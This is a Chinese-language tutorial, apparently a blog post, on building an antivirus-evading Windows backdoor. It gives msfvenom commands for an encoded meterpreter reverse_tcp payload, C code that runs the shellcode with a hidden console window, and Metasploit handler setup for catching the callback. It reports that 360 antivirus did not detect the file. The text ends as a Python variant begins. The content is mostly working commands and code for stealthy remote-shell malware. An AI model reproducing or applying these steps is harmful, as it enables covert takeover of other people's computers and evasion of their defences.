NO.1
利用工具
msf
msf全称 MetasploitFramework,是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。
vc++
c编译器
实现过程
1.使用msfvenom生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ lhost=192.168.68.129 lport=3333 -f c -o /root/Desktop/shell/shell.c
-p : 指定payload; -e :指定编码方式; -i :编译次数; -b :去除指定代码,一般是空代码或者错误代码; lhost :指定本机IP; -lport :指定本机监听端口; -f :指定生成格式; -o指定生成输出后存储文件的位置
上图
2. 加入入口函数,开始编译
main()
{
((void(*)(void))&buf)();
}
上图
执行后会在下方有显示,不成功会报错,成功会提示error为0(3是开始执行,这里我没点,我待会手动运行)
最后会在你原文件存在的目录生成exe可执行文件
编译ok
3. 开始监听
msfconsole //运行msf
use exploit/multi/handler //使用handler模块
set lhost 192.168.68.129 //这里的IP需要和exp中IP一致
set lport 3333 //端口与IP一样要和上面的端口一致
set payload windows/meterpreter/reverse_tcp //指定payload
exploit //开始监听
上图
4. 运行exe,看是否免杀
可以看到监听到IP
查看返回的session
运行成功,360没有报毒
但是有没有发现运行exe文件会弹出一个命令框,这样很容易就被发现了,所以需要对这个exp进行完善,所以请看number tow
NO.2
前面的步骤都一样,在编译时多添几行代码
#include<stdio.h>
#include<windows.h>
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //禁止弹窗
上图
运行监听
360没报毒
OK;
以上呢都是c编译的,还有一种方法,可以使用Python编译生成exp,详细见number three
NO.3
利用工具
- msf
- Python2
实现过程
1.生成.py的shellcode
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ lhost=192.168.68.129 lport=3333 -f py -o /home/shell/test001.py
上图